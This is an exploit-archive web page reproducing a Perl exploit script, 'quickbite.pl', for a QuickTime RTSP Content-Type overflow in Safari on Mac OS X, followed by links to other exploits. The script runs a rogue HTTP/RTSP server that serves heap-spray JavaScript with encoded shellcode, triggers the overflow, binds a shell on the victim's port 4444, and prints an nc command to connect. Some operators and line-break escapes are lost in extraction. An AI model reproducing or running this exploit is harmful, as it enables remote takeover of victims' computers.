手机
当前位置:查字典教程网 >网络安全 >Exploit >Safari Quicktime
Safari Quicktime
摘要:#!/usr/bin/perl##quickbite.pl##SafariQuicktime

#!/usr/bin/perl

#

# quickbite.pl

#

# Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit

# for Mac OS X (Intel)

#

# Tested with OS X 10.4.

# On victim, browse to http://server:8080/

# Binds shell on port 4444.

#

# by krafty

#

# greets to sk, halvar, grugq, and all the ethnical hackers

# extra thanks to ddz for osx hackery

# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc

# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.

# milw0rm and packetstorm rule

# Bring back the days of technotronic and r00tshell! Freedom.

#

# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:

# "What's worse than biting into an apple and finding a worm?"

# "Finding half a worm".

use Socket;

use IO::Handle;

use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";

$buf = chr(0x11) x 6000;

# don't touch anything below this line

$html = <<ENDHTML;

<script>

var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");

var shellcode = unescape("$shellcode");

shellcode = prefix shellcode;

var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");

do {

spray = spray;

} while(spray.length < 0xc0000);

memory = new Array();

for(i = 0; i < 50; i )

memory[i] = spray shellcode;

var url = "rtsp://" location.host "/x.mp3";

document.write("<EMBED SRC='" url "' TYPE='video/quicktime' AUTOPLAY='true' />");

</script>

ENDHTML

$rtsp_body =

"v=0rn" .

"o=- 16689332712 1 IN IP4 0.0.0.0rn" .

"s=MPEG-1 or 2 Audiorn" .

"i=1.mp3rn" .

"t=0 0rn" .

"a=tool:hellorn" .

"a=type:broadcastrn" .

"a=control:*rn" .

"a=range:npt=0-213.077rn" .

"a=x-qt-text-nam:MPEG-1 or 2 Audiorn" .

"a=x-qt-text-inf:1.mp3rn" .

"m=audio 0 RTP/AVP 14rn" .

"c=IN IP4 0.0.0.0rn" .

"a=control:track1rn";

$content_length = length($rtsp_body);

$rtsp_header =

"RTSP/1.0 200 OKrn" .

"CSeq: 1rn" .

"Date: 0x00 :Prn" .

"Content-Base: rtsp://0.0.0.0/x.mp3/rn" .

"Content-Type: $bufrn" .

"Content-Length: $content_lengthrnrn";

$rtsp = $rtsp_header . $rtsp_body;

$http_header = "HTTP/1.1 200 OKnContent-type: text/htmlnn";

$| = 1;

my $port = MY_HTTP_PORT;

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";

setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";

my $my_addr = sockaddr_in($port,INADDR_ANY);

bind(SOCK,$my_addr) or die "bind() failed: $!";

listen(SOCK,SOMAXCONN) or die "listen() failed: $!";

warn "waiting for incoming connections on port $port...n";

$repeat = 1;

$victim = inet_aton("0.0.0.0");

while($repeat) {

next unless my $remote_addr = accept(SESSION,SOCK);

my ($port,$hisaddr) = sockaddr_in($remote_addr);

warn "Connection from [",inet_ntoa($hisaddr),",$port]n";

$victim = $hisaddr;

SESSION->autoflush(1);

$request = "";

while(<SESSION>) {

$request_line = $_;

$request .= $request_line;

chomp($request_line);

if($request_line =~ /DESCRIBE rtsp/) {

$repeat = 0;

}

$x = length($request_line);

if($x <= 1) {

last;

}

}

print STDERR $request;

if($repeat) {

print SESSION $http_header . $html;

}

else {

print SESSION $rtsp;

}

warn "Connection from [",inet_ntoa($hisaddr),",$port] finishedn";

close SESSION;

}

print "Connect to ".inet_ntoa($victim).":4444 after 5 secondsn";

print "nc -nvv ".inet_ntoa($victim)." 4444nEnjoy!n";

【Safari Quicktime】相关文章:

AuraCMS

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

Maian Recipe

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

WS_FTP Home/Professional FTP Client Remote Format String PoC

The Personal FTP Server 6.0f RETR Denial of Service Exploit

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

上一篇: Ultrastats
精品推荐
分类导航